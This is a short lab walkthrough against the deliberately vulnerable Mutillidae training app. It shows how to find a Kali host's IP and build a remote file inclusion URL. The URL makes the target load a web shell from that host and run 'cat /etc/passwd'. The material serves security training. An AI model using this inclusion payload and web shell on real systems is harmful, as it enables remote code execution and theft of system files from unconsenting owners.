Step 1: Find the external IP address for the Kali Linux host operating system

Command: ip address show dev eth0

Step 2: Substitute the external IP address into the following URL

http://mutillidae.localhost/index.php?page=http://<external IP address>:8888/simple-web-shell.php&pCommand=cat+/etc/passwd


Example output from "ip" command:

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:6a:97:16 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
       valid_lft 48680sec preferred_lft 48680sec
    inet6 fe80::a00:27ff:fe6a:9716/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

       
Example URL based on above output from "ip" command

http://mutillidae.localhost/index.php?page=http://10.0.2.15:8888/simple-web-shell.php&pCommand=cat+/etc/passwd
